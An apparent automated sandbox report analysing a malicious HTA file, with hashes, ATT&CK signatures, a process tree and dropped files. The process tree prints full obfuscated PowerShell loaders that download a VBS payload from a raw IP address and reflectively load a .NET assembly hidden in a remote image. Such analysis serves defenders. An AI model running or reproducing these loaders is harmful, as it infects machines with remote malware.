7a27c246967ee9e339939078beca4363d45d663aefb9c9b49fe891136b70e4ae

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-02-2025 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nicegirlgivenmebestthingswithentiretimegoodfor.hta
Size

15KB
MD5

91646dc944a9b144775945568f2acea3
SHA1

10b33643c23d1ed56a9702c16c030f851215fa2a
SHA256

7a27c246967ee9e339939078beca4363d45d663aefb9c9b49fe891136b70e4ae
SHA512

3a5e252523306c2bf0928987cd2bd1af6803995962424a2873caa965a5f4b7a90bbbe6128600c85889944a1bd297f27ec792ce3afb563ae0afc8d46e717e847c
SSDEEP

48:3PCAuD4bcMcMzn4bcM4ken2tsdz2BAvNupkfxRfvCFBlTEwQ4X4bcMeKdPG:/CVot4sdqBk0pcaW+

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2504	powershell.exe
6	2680	powershell.exe
8	2680	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3040	cmd.exe
2504	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2504	powershell.exe
2680	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 3040	2004	mshta.exe	30
PID 2004 wrote to memory of 3040	2004	mshta.exe	30
PID 2004 wrote to memory of 3040	2004	mshta.exe	30
PID 2004 wrote to memory of 3040	2004	mshta.exe	30
PID 3040 wrote to memory of 2504	3040	cmd.exe	32
PID 3040 wrote to memory of 2504	3040	cmd.exe	32
PID 3040 wrote to memory of 2504	3040	cmd.exe	32
PID 3040 wrote to memory of 2504	3040	cmd.exe	32
PID 2504 wrote to memory of 1428	2504	powershell.exe	33
PID 2504 wrote to memory of 1428	2504	powershell.exe	33
PID 2504 wrote to memory of 1428	2504	powershell.exe	33
PID 2504 wrote to memory of 1428	2504	powershell.exe	33
PID 1428 wrote to memory of 2336	1428	csc.exe	34
PID 1428 wrote to memory of 2336	1428	csc.exe	34
PID 1428 wrote to memory of 2336	1428	csc.exe	34
PID 1428 wrote to memory of 2336	1428	csc.exe	34
PID 2504 wrote to memory of 2872	2504	powershell.exe	36
PID 2504 wrote to memory of 2872	2504	powershell.exe	36
PID 2504 wrote to memory of 2872	2504	powershell.exe	36
PID 2504 wrote to memory of 2872	2504	powershell.exe	36
PID 2872 wrote to memory of 2680	2872	WScript.exe	37
PID 2872 wrote to memory of 2680	2872	WScript.exe	37
PID 2872 wrote to memory of 2680	2872	WScript.exe	37
PID 2872 wrote to memory of 2680	2872	WScript.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicegirlgivenmebestthingswithentiretimegoodfor.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOwErShEll.EXe -Ex BYpaSs -NOP -w 1 -c deViCeCREDENtiAldEPlOyMenT ; INvOKe-expreSsion($(iNVOKe-EXpResSIOn('[syStEm.TeXt.ENcoDinG]'+[chAR]0X3a+[char]0X3A+'utF8.gETsTRInG([sySTEM.CONVeRT]'+[CHar]58+[cHar]0X3a+'frOmBAsE64StRiNg('+[CHAr]34+'JFBkMSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJERWZJbml0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZuTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDZVdwV3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT09vbWdGdXFULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZZmssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGFmREQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqUkRwemwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFBkMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjg2Lzc0NC9uZXd0aGluZ3NhcmViZXR0ZXJ3YXl0b2dldG1lYmFja2dvb2R0aGluZ3NhbHdheXMuZ0lGIiwiJGVudjpBUFBEQVRBXG5ld3RoaW5nc2FyZWJldHRlcndheXRvZ2V0bWViYWNrZ29vZHRoaW5nc2Fsd2F5LnZicyIsMCwwKTtzdEFSdC1TTEVlUCgzKTtJbnZPa0UtRXhwckVTc2lPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmV3dGhpbmdzYXJlYmV0dGVyd2F5dG9nZXRtZWJhY2tnb29kdGhpbmdzYWx3YXkudmJzIg=='+[cHaR]0x22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3040
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwErShEll.EXe -Ex BYpaSs -NOP -w 1 -c deViCeCREDENtiAldEPlOyMenT ; INvOKe-expreSsion($(iNVOKe-EXpResSIOn('[syStEm.TeXt.ENcoDinG]'+[chAR]0X3a+[char]0X3A+'utF8.gETsTRInG([sySTEM.CONVeRT]'+[CHar]58+[cHar]0X3a+'frOmBAsE64StRiNg('+[CHAr]34+'JFBkMSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJERWZJbml0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZuTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDZVdwV3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT09vbWdGdXFULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZZmssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGFmREQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqUkRwemwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFBkMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjg2Lzc0NC9uZXd0aGluZ3NhcmViZXR0ZXJ3YXl0b2dldG1lYmFja2dvb2R0aGluZ3NhbHdheXMuZ0lGIiwiJGVudjpBUFBEQVRBXG5ld3RoaW5nc2FyZWJldHRlcndheXRvZ2V0bWViYWNrZ29vZHRoaW5nc2Fsd2F5LnZicyIsMCwwKTtzdEFSdC1TTEVlUCgzKTtJbnZPa0UtRXhwckVTc2lPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmV3dGhpbmdzYXJlYmV0dGVyd2F5dG9nZXRtZWJhY2tnb29kdGhpbmdzYWx3YXkudmJzIg=='+[cHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2504
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i-3i0dqt.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1428
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2336
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingsarebetterwaytogetmebackgoodthingsalway.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2872
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AYQB3AGcAbgBpAGgAdAB5AHIAZQB2AGUAcgBvAGYAZABvAG8AZwBlAGgAcwAvADQANAA3AC8ANgA4AC4AMwAyADEALgA1ADQAMgAuADIANwAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABhAHgAdwB1AGEANgAzAHkALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMANwA2ADkANgAxADcAMQAvAGgAZQBrAGUAMgBwAG0AdABlAHUAdwA4AHMAcQBzAHAAbABoAGsAbAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabCAEF.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp

Filesize
1KB

MD5
4df06e052219cd3c4fd06bef5ed75c6e

SHA1
d297dc6b92a3c3127669441e16b621631f8d068c

SHA256
9591a38083ca2988c125e3dd3841e843d9f5eab93b56c3f5fc72306cb70ae31f

SHA512
f7d1266a2742aa4187f5109862861f1258acf268f6a65b85b0f6bad2f644ed31727519ca5d6e1e47058b3e65ecf85cf1de03f7f7e5b29c662bdd24dc00c6b8f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarCB11.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\i-3i0dqt.dll

Filesize
3KB

MD5
d1a7680fb1ade2d68ee31a1e05891c27

SHA1
c896a841cb3314e7e4a144ffb2e4bc7970f21c1a

SHA256
4001e4c3d401ce544814c14fdf01274837b7e053034ec81501725bfe0c8c031c

SHA512
ccf919a33973194a0bd4d1273f860d697308e8c307ac7584a83ae37e31a1d310cdde8879f2f5f1e297147983e95d816ddc48163c835e2896d22fed92e954cafa

Download Submit
C:\Users\Admin\AppData\Local\Temp\i-3i0dqt.pdb

Filesize
7KB

MD5
adb433ac2bed31de416a6965fa65c3c6

SHA1
cde3a5953ccc872d9e930f8954b64bae0fe658a3

SHA256
007efe13b407e90a05da2761e641cc64489f0b85c4b6a4691e08cd5f5f78e654

SHA512
59d01833f409fd18d86983a0060b01a6a668b8ae71c4da4acb4123e2bc84c7cd4c115e73313b59a02a30ed3d639d691e0f7edd2392b60361cb5b813ce84dc90e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6cb3799376fb9c19879297cc5765c10c

SHA1
829b08f3c19312563d315efa8fa9e230d7d6696d

SHA256
3b54e50760aa4dea90b873a5b6c2f0631a5b9ee53df1bd5769e7ce796b6e6e3f

SHA512
120c381c1321564572ab7bf55d3bbffc60d28165d5a1bef8d0be2c52f74a0f80ca1a8e714681cc08e96a448f3ee536f9d9326a4e2073759c3372df40fbfe1038

Download Submit
C:\Users\Admin\AppData\Roaming\newthingsarebetterwaytogetmebackgoodthingsalway.vbs

Filesize
223KB

MD5
89fcf06221c1830a49699337619dede8

SHA1
271b9e22164d51304be579097a14b63b49b6779e

SHA256
535ce1889084523a7a1c04a570ca2000b924d5289cd1276146665c531ee2157e

SHA512
4842ee71b17d3848ec0517c3953eaae90ed0f9ac8249f20306c891e3954021dc648c97ac9bf2c2cea58df669fd492e922300bb229fcacefadedee30d72a733e4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp

Filesize
652B

MD5
87c556f1cefe604117dba0ee463f2662

SHA1
2c3dca3bcbc1631aa7fa9b6160014e58abbb38d6

SHA256
2c69ed293cb4914b841c08c31948f548d9be45cea3311a4090d40ffb0710df9c

SHA512
f6535495480bfd547279a1311c86690d19fffdee781904e77d9ac339ac6d32044b360daa9c7b730b5dec7eef179319aa9a9be08e55202bec76139d1edbc37d37

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i-3i0dqt.0.cs

Filesize
466B

MD5
255c71170d7a96f4371816ea477745d5

SHA1
945c5a56ca2eced03c95d864876c30cbe8cc5e1b

SHA256
038969e25a28b8206b3a16c9b2ee846f9d55c8a2c4e5e12be7e0dc7f6e2a8a75

SHA512
e0972176b389e3689c22d3db51b16d4f3fc5f1015bab41e735f39f1ffa7de8660d61fe666ddc2c96430800d7508a23f150e17fb87f938359fcfe20474f9f3ab1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i-3i0dqt.cmdline

Filesize
309B

MD5
4445b9c2ebbab2d6e3ab201c02a71cee

SHA1
b6f1f5dd56d5f7cc1718cffd4d56ef5c337dc9ac

SHA256
e6e0b68558d9609ecdb1c43ffacc67e8a3751304d7aaf15efcd57f5e5776118b

SHA512
7de929e4b6898e7ca084731beef76c23c55684f650d83f4040728a3051045d21ad1817a0f1c5ef3b781c38e02a1d145f1df970de9fd67db22bb4f05b804d1b59

Download Submit